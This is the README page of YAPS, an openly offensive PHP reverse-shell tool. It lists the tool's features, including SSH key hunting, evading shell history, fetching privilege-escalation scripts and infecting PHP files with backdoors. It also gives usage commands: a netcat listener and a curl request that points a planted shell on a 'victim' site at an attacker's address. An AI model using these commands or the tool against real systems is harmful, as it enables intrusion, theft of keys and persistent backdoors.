| .. | ||
| readme.md | ||
| yaps.php | ||
YAPS - Yet Another PHP Shell
Yeah, I know, I know... But that's it. =)
As the name reveals, this is yet another PHP reverse shell, one more among hundreds available out there. It is a single PHP file containing all its functions and you can control it via a simple netcat listener (nc -lp 1337).
In the current version (1.3.1), its main functions support only linux systems, but i'm planning to make it work with Windows too.
It's currently in its first version and I haven't tested it much yet, and there are still many things I intend to do and improve for the next versions (it's not done yet!), so please let me know if you've found any bugs. =)
Features
- Single PHP file (no need to install packages, libs, or download tons of files)
- Works with netcat, ncat, socat, multi/handler, almost any listener
- Customizable password protection
- No logs in .bash_history
- Can do some enumeration
- Network info (interfaces, iptables rules, active ports)
- User info
- List SUID and GUID files
- Search for SSH keys (public and private)
- List crontab
- List writable PHP files
- Auto download LinPEAS, LinEnum or Linux Exploit Suggester
- Write and run PHP code on remote host
- (Semi) Stabilize shell
- Duplicate connections
- Auto update
- [new] Infect PHP files with backdoors
Cons
- Connection isn't encrypted (yet) (nc does not support SSL)
- Not fully interactive (although you can spawn an interactive shell with
!stabilize)- CTRL+C breaks it; can't use arrows to navigate (unless you use
rlwrap nc -lp <ip> <port>)
- CTRL+C breaks it; can't use arrows to navigate (unless you use
Usage
- Set up a TCP listener;
- Set your IP and port. This can be done by:
- 2.1 Editing the variables at the start of the script;
- 2.2 Setting them via post request (
curl -x POST -d "x=ip:port" victim.com/yaps.php);
- Open yaps.php on browser, curl it or run via CLI;
- 3.1 You can set
yaps.php?soryaps.php?silentto supress the banner - 3.2 You can run via CLI with
php yaps.php ip port
- Hack!
Working commands
!help - Display the help menu!all-colors - Toggle all colors (compatible with colorless TTY)!color - Toggle PS1 color (locally only, no environment variable is changed)!duplicate - Spawn another YAPS connection!enum - Download LinPEAS and LinEnum to /tmp and get them ready to use!info - list informations about the target (the enumeration I mentioned above)!infect - Infect writable PHP files with backdoors!stabilize - Spawn an interactive reverse shell on another port (works w/ sudo, su, mysql, etc.)!passwd - Password option (enable, disable, set, modify)!php - Write and run PHP on the remote host!suggester - Download Linux Exploit Suggester to /tmp and get it ready to use
Screenshots
Changelog
v1.3.1 - 01/08/2021
- Bugs fixed v1.3 - 28/07/2021
- Added
!infectto infect PHP files with backdoors - Changed
!stabilizepayload (bugs fixed) v1.2.2 - 18/07/2021 - Changed 'update' function
- Changed 'connect' function
- Improved 'download' function
- Bugs fixed v1.2.1 - 17/07/2021
- Bugs fixed v1.2 - 17/07/2021
- Added
!duplicateto spawn another shell - Added update verification (
--update|-u) - Added CLI arguments (
--help|-h) - Added socket via arguments (
php yaps.php ip port) - Changed stabilize shell method (doesn't freeze anymore)
- Changed download method
- Changed connection method via POST (receives a single parameter) v1.1 - 12/07/2021
- Added
!all-colorsto toggle terminal colors and work with colorless TTYs - Added
exitcommand to close socket (leave shell) - Changed payload in
!stabilizeto unset HISTSIZE and HISTFILE - Changed the method of obtaining CPU and meminfo in
!infov1.0.1 - 08/07/2021 - Changed
[x,y,z]toarray(x,y,z)to improve compatibility with older PHP versions - Changed payload for interactive shell to work with PHP<5.4
Credits
Some ideas were inspired by this tools:
Linpeas
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
Linenum
https://github.com/rebootuser/LinEnum
Suggester
https://github.com/AonCyberLabs/Windows-Exploit-Suggester